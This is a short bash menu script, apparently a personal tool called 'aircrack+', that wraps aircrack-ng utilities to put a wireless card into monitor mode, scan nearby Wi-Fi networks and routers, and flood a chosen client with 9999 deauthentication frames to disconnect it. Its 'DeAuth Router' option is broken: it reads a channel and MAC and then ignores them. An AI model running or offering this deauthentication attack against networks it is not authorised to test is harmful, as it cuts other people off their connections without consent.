#!/bin/bash

# menu
print_menu() {
    echo -e "\e[32mSelect an option:\e[0m"
    echo -e "\e[94m1. \e[36mScan\e[0m"
    echo -e "\e[94m2. Router \e[36mScan\e[0m"
    echo -e "\e[94m3. \e[37mDeAuth \e[94mDevice\e[0m"
    echo -e "\e[94m4. \e[37mDeAuth \e[94mRouter\e[0m"
    echo -e "\e[31m5. Exit\e[0m"
    
    echo -e "\e[32m 			aircrack+ \e[94mby MavaaQ\e[0m"
}

sudo airmon-ng check kill
sudo airmon-ng start wlp1s0

while true; do
    print_menu
    read -p "Choice: " choice
    case $choice in
        1)  # Total Scan
            sudo airodump-ng wlp1s0mon
            ;;
        2)  # Router Scan
            read -p "Enter channel: " channel
            read -p "Enter router MAC adress: " router_mac
            sudo airodump-ng --channel $channel --bssid $router_mac wlp1s0mon
            ;;
        3)  # DeAuth Device
            read -p "Enter router MAC adress: " first_mac
            read -p "Enter user MAC adress: " second_mac
            sudo aireplay-ng --deauth 9999 -a $first_mac -c $second_mac wlp1s0mon
            ;;
        4)  # DeAuth Router
            read -p "Enter channel: " channel
            read -p "Enter router MAC adress: " router_mac
            sudo airodump-ng 
            ;;
        5)  # Exit
            sudo airmon-ng stop wlp1s0mon
            sudo service NetworkManager restart
            exit 0
            ;;
        *)  # Invalid choice
            echo "Invalid choice."
            ;;
    esac
done

